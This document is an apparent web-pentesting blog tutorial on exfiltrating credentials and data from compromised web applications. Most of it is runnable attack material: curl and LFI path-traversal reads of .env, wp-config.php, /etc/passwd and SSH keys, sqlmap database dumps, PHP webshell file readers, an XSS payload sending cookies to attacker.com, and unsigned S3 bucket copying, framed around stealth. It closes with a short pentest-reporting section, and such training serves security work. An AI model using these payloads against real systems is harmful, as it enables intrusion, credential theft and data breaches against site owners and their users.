/ Uncategorized, Web-Pentesting / By

Exfiltrating Credentials and Sensitive Data from Web Applications

Getting inside the castle is one thing. Looting it without setting off alarms? That’s where real skill comes in. Once you’ve compromised a web application, the next step is clear: find and extract sensitive data—usernames, passwords, tokens, configuration files, database records, and anything else the devs forgot to lock up.

Objectives of Data Exfiltration

After gaining access to a web app, your goal is to:

  • Extract user credentials and session tokens
  • Steal secrets and configuration data (API keys, DB creds)
  • Access or dump entire databases
  • Identify lateral movement opportunities

Common Sources of Sensitive Data

1. Configuration Files

  • .env files (Node, Laravel)
  • wp-config.php (WordPress)
  • .git/config if exposed
  • config.php, settings.py, etc.
curl http://target.com/.env
# Look for DB credentials, API tokens

2. Backup Files and Misplaced Dumps

  • db_backup.sql, backup.zip, config.bak
  • Common naming patterns: /backup.zip /site-old/ /db.sql /config.php.bak

3. LFI with Sensitive File Reads

If LFI is present:

http://target.com/index.php?page=../../../../wp-config.php

On Linux targets:

/etc/passwd
/var/www/html/.env
/root/.ssh/id_rsa

Tools & Techniques

sqlmap

sqlmap -u "http://target.com/product?id=1" --dump
# --dump: Extract entire DB
# --passwords: Grab password hashes
# --batch: Non-interactive mode

curl + grep

curl http://target.com/.env | grep DB_PASSWORD

wget for Large Files

wget http://target.com/backup.zip
unzip backup.zip

base64 + exfiltration

If outbound access is blocked:

cat db_dump.sql | base64
# Copy the encoded string, paste somewhere external, decode it offline

Exfil Through Webshells

If you uploaded a PHP webshell:

<?php echo file_get_contents('/var/www/html/.env'); ?>

Or download a file directly:

<?php readfile('backup.zip'); ?>

Access it through:

http://target.com/shell.php?cmd=cat%20/etc/passwd

From XSS to Token Theft

In stored or reflected XSS:

<script>
  fetch('http://attacker.com/steal.php?c=' + document.cookie)
</script>

This lets you capture session tokens or JWTs if HttpOnly isn’t set.

Cloud Misconfigurations

If S3 buckets or GCP buckets are misconfigured:

aws s3 ls s3://public-bucket-name --no-sign-request
aws s3 cp s3://public-bucket-name/secrets.txt . --no-sign-request

Real-World Flow

Target: http://dev-vulnerable.local
- Found SQLi on /products?id=
- sqlmap dumps credentials from users table
- Found /backup.zip via ffuf
- Unzipped and found .env file with DB_PASSWORD
- Found admin portal with basic auth, reused creds
- Accessed internal dashboard, found user exports
- Dumped all data for reporting

What to Look For in Your Report

When documenting a successful exfiltration, include:

  • Exact data exfiltrated (usernames, hashes, secrets)
  • Paths and methods used (e.g., .env file via LFI)
  • Tools used (sqlmap, curl, wget)
  • Screenshots (if permitted)
  • Recommendations: remove public files, restrict access, rotate creds

Final Thoughts

Exfiltration isn’t just about downloading everything you can—it’s about doing it stealthily, selectively, and effectively. Learn where devs accidentally stash their secrets, and know the tools that can help you pull them out like a magician pulling rabbits from a hat.

Related Posts

Scroll to Top